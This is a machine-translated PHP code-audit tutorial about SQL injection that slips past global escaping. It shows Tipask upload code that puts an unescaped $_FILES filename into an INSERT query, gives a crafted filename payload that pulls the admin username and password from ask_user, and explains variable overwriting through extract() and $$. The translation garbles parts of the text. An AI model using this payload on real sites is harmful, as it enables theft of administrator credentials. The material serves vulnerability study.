[PHP code audit] in those years, we will explore SQL injection together-8. Summary of global protection blind spots-php Tutorial

Source: Internet
Author: User
[PHP code audit] in those years, we will explore SQL injection together-8. Summary of global protection blind spots. Part 2: background 0x01

Currently, WEB applications usually defend against SQL injection by checking whether GPC is enabled, and then using the addlashes function to escape special characters such as single quotes. But the use of such protection alone is a lot of blind spots, next to the http://www.waitalone.cn/php-code-audit-6.html, here to introduce the other two cases.

Blind spots:

① FILES injection. only parameters such as GET and POST are escaped globally, and FILES are omitted;

② Override Variables. dangerous functions: extract (), parse_str (), and $.

0x02 vulnerability analysis FILES injection

FILES injection is generally generated by bringing the uploaded name to the insert database during the upload process. for details, refer to the tipask Q & A system.

First, let's take a look at how global protection works:

Index. in php: include TIPASK_ROOT. '/model/tipask. class. php '; $ tipask = new tipask (); $ tipask-> run ();...... follow up to/model/tipask. class. in php: function init_request (){...... $ this-> get = taddslashes ($ this-> get, 1); $ this-> post = taddslashes (array_merge ($ _ GET, $ _ POST )); checkattack ($ this-> post, 'post'); checkattack ($ this-> get, 'Get'); unset ($ _ post );}

We can see that addslashes special escape processing is performed on the data transmitted from get and post, and no processing operation is performed on $ _ FILES. we searched $ _ FILES globally and found/control/attach. php has Upload processing. Follow up:

 "Data/attach/", // save path "fileType" => array (". rar ",". doc ",". docx ",". zip ",". pdf ",". txt ",". swf ",". wmv "," xsl "), // file format" fileSize "=> 10 // file size limit, in MB); // file Upload status, if SUCCESS is returned successfully, the corresponding string $ state = "SUCCESS"; $ clientFile = $ _ FILES ["upfile"]; if (! Isset ($ clientFile) {echo "{'state': 'The file size exceeds the server configuration! ', 'URL': 'null', 'filetype': 'null'} "; // modify php. upload_max_filesize and post_max_sizeexit;} // format verification $ current_type = strtolower (strrchr ($ clientFile ["name"], '. '); if (! In_array ($ current_type, $ config ['filetype']) {$ state = "unsupported file type! ";}// Size verification $ file_size = 1024*1024 * $ config ['filesize']; if ($ clientFile [" size "]> $ file_size) {$ state = "the file size exceeds the limit! ";}// Save the file if ($ state =" SUCCESS ") {$ targetfile = $ config ['uploadpath']. gmdate ('ymm', $ this-> time ). '/'. random (8 ). strrchr ($ clientFile ["name"], '. '); $ result = $ _ ENV ['Attach']-> movetmpfile ($ clientFile, $ targetfile); if (! $ Result) {$ state = "an error occurred while saving the file! ";} Else {// Here, we will bring the uploaded file name to the database for query $ _ ENV ['Attach ']-> add ($ clientFile [" name "], $ current_type, $ clientFile ["size"], $ targetfile, 0) ;}// return the json data echo '{"state": "' to the browser ":"'. $ state. '"," url ":"'. $ targetfile. '"," fileType ":"'. $ current_type. '"," original ":"'. $ clientFile ["name"]. '"}';}

You can see $ _ ENV ['Attach ']-> add ($ clientFile ["name"]…), Add $ clientFile [name] = $ _ FILES ["upfile"] [name] to the following add warehouse operation, resulting in injection.

 base->user['uid'];$this->db->query("INSERT INTO ".DB_TABLEPRE."attach(time,filename,filetype,filesize,location,isimage,uid)  VALUES ({$this->base->time},'$filename','$ftype','$fsize','$location',$isimage,$uid)");return $this->db->insert_id();}

Upload a file and change the file name to the following code to get the administrator account password:

Filename = "1 ','. php', 1, (select concat (username, 0x23, password) from ask_user limit 1digit, 2, 1 digit ).jpg"

The password of the administrator account is successfully inserted into the attach table in the database:

Variable overwrite

There are many extract functions. for example, extract ($ _ POST) will directly retrieve the variables from the POST array and overwrite the previous variables.

     

In the browser, post directly transmits a = 1, and it is found that the value of variable a is successfully overwritten.

At present, the case of Wooyun http://www.wooyun.org/bugs/wooyun-2014-053189 is appear on the overwrite table prefix.

$ Override variables

The principle is actually the same as above. there is a classic $ variable overwrite code:

  $_value){$$_key = addslashes($_value);}}echo $a;

The test found that the variable a was successfully overwritten.

Case: http://www.wooyun.org/bugs/wooyun-2010-055338

Original

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.